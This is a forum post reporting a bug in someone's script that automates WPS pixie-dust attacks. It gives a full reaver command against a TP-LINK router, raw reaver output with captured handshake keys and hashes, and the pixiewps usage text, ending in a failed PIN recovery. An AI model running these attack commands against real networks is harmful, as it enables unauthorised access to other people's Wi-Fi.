@mmusket33
I like the idea of your script to automatically try different data sets. I tried it out and it didnt parse the output from reaver correctly.
The E-Nouce, PKE were blank......... and it leaves out (-m, --r-nonce : Registrar nonce) - but all required data was in the reaver output
usuage command line:
reaver -i wlan2mon -b 00:00:00:00:A7:7C -m 00:00:00:00:2c:ee -vv -f -c6 -N -K1 -s y -A -t30 | tee /root/VARMAC_LOGS/TP-TP-LIN00000000
PDDSA-05.sh output:Code:Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire [+] Switching wlan2mon to channel 6 [+] Waiting for beacon from 00:00:00:00:A7:7C [+] Associated with 00:00:00:00:A7:7C (ESSID: TP-TP-LIN0000000) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: ba:18:d0:c0:0a:6f:9e:9e:02:48:74:3c:c4:17:8e:1a [P] PKE: 8f:e6:47:0d:0c:c9:ee:9e:be:28:9b:c7:64:00:ed:b7:54:21:65:5d:c3:74:cb:9f:97:08:42:19:0e:b0:6a:da:91:41:97:1f:f0:79:1d:ae:d8:e3:9c:ac:10:cc:17:73:77:2a:d5:6b:68:d3:3c:85:9a:8d:ef:57:ce:bc:07:c2:7b:4b:24:f1:36:ea:0a:f7:50:b2:e4:24:89:38:99:df:b8:a9:5d:5b:29:b9:87:a7:59:72:3c:7a:6c:d7:da:88:b7:bb:4b:d9:97:08:b5:00:0c:c1:c3:96:8f:10:48:b8:5e:e6:e9:0e:0b:f4:2d:cf:4a:5a:bd:62:e3:27:1f:3e:13:93:ab:1a:b2:bd:bf:1f:41:d4:a5:4d:d9:a9:59:13:16:f0:d0:da:ad:a0:67:b4:34:27:f8:1a:85:4a:2e:a0:c0:b4:12:10:ba:54:d3:4f:ce:37:51:3f:72:f9:6d:99:d4:49:07:ca:13:2b:6f:41:bc:8a:c7:ac:bf:7b:14:58 [P] WPS Manufacturer: TP-LINK [P] WPS Model Name: TL-WR720N [P] WPS Model Number: 1.0 [P] Access Point Serial Number: 1.0 [+] Received M1 message [P] R-Nonce: 11:a4:d4:0f:5e:9e:dd:57:ae:12:5e:35:f2:49:43:18 [P] PKR: 19:6c:b3:0b:98:97:39:c2:3c:a3:f9:10:02:64:d9:07:61:23:7e:f4:71:c7:8f:c1:0e:a9:2c:47:fd:25:7b:61:92:f7:90:fe:05:60:d6:ae:3c:8e:44:60:9f:1e:50:37:e3:5e:e5:e2:fc:b0:59:5f:37:a7:54:1a:33:63:92:ce:96:6b:9a:dd:2e:8b:cd:86:c7:1c:da:ef:45:04:be:c9:b2:0e:cd:14:ad:12:24:25:fb:32:b7:65:40:28:29:f8:5d:98:29:1c:26:1b:6e:10:93:5b:7b:56:1d:4d:84:c9:0d:cb:49:ae:4f:4c:0b:5b:b8:16:80:6e:13:59:fc:52:84:f8:33:3a:49:ee:91:31:8a:a2:4e:1a:01:b2:42:3d:a1:1c:4a:64:33:ae:db:11:05:3c:39:d5:45:69:b4:b5:a6:42:6b:95:2f:3f:b6:07:26:cb:5c:4f:dc:7f:fd:b8:f2:84:6c:5e:23:c6:e0:fd:2e:1d:fa:0a:1f:51:e1:fa [P] AuthKey: ad:4e:14:01:53:68:1f:c9:4b:bc:c7:7d:ab:96:08:2a:03:6d:dd:29:de:72:21:85:b0:08:a8:0b:bb:66:af:4b [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [P] E-Hash1: b6:9a:85:cb:6d:f9:67:b7:1f:00:9a:da:58:b7:60:ab:01:18:7e:92:5b:5a:43:64:49:6e:d9:32:46:1f:38:ff [P] E-Hash2: ab:75:8b:80:2e:68:3f:d7:d3:01:b5:81:dc:d6:0a:1e:d4:f0:67:d1:6d:d3:0e:be:80:9a:8f:d7:17:87:ac:2d [+] Running pixiewps with the information, wait ... [Pixie-Dust] [Pixie-Dust] Pixiewps 1.1 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found!
This was with repeated tries, in first try not posted here i used -P in reaver, in every set it left out PKE, and Enouce...no RnouceCode:E-Nonce: = E-BSSID: = 00:00:00:00:A7:7C PKE: = PKR: = 8e:8b:95:32:8b:63:02:72:29:fc:4a:60:6f:ba:63:42:e9:e3:f7:39:d3:86:fe:09:d7:94:22:48:5c:40:fd:17:54:f6:30:f5:ba:84:49:4e:34:fb:34:d8:44:c5:c9:ef:bf:e4:56:98:f8:0b:38:e4:00:39:b7:aa:75:6d:5a:77:fb:5a:eb:86:2c:86:f0:cd:44:fd:81:9d:b3:1f:e4:de:10:02:e2:02:40:f5:f3:72:ec:eb:b4:15:96:69:7a:54:ce:48:66:2a:5d:3b:6d:28:82:0c:f8:58:5f:71:31:79:45:72:a7:bd:15:89:46:ec:dc:c1:7f:a6:b5:aa:9a:51:8e:28:5d:4a:3e:87:27:f9:d9:e1:30:4e:44:aa:18:63:62:79:7e:a7:4f:85:9c:e7:5e:1d:ca:e5:81:e3:04:98:94:8c:3b:8c:b0:9c:4b:05:bb:99:3e:7b:86:19:f3:e6:e7:ae:64:be:d6:13:08:d0:9b:74:f4:b5:72:9b:62:8d AuthKey: = 44:7a:30:93:b2:57:65:37:ed:9e:68:ce:32:68:f6:3f:6f:93:7d:cd:9c:01:fa:8a:17:0f:25:be:94:9c:fb:03 E-Hash1: = 96:0a:c7:fa:93:37:cd:7e:28:31:6f:a5:af:58:95:e7:28:ae:c4:54:75:62:de:8e:39:34:71:0a:ea:c4:91:bc E-Hash2: = df:67:fb:4e:b9:bb:b6:0c:82:78:80:99:7c:bb:9f:a4:b2:4f:04:fd:e0:db:dd:32:ae:5b:f1:0a:7c:35:ae:c8 Pixiewps 1.1 WPS pixie dust attack tool Copyright (c) 2015, wiire <[email protected]> Usage: pixiewps <arguments> Required Arguments: -e, --pke : Enrollee public key -r, --pkr : Registrar public key -s, --e-hash1 : Enrollee Hash1 -z, --e-hash2 : Enrollee Hash2 -a, --authkey : Authentication session key Optional Arguments: -n, --e-nonce : Enrollee nonce (mode 2,3,4) -m, --r-nonce : Registrar nonce -b, --e-bssid : Enrollee BSSID -S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No] -f, --force : Bruteforce the whole keyspace (mode 4) [No] -v, --verbosity : Verbosity level 1-3, 1 is quietest [2] -h, --help : Display this usage screen Examples: pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S [!] Bad enrollee nonce -- --e-bssid WPS Pin Not Found. Pixie Dust Sequences Exhausted - ending program.
I'm happy to help beta, but you should probably make your thread to troubleshoot.
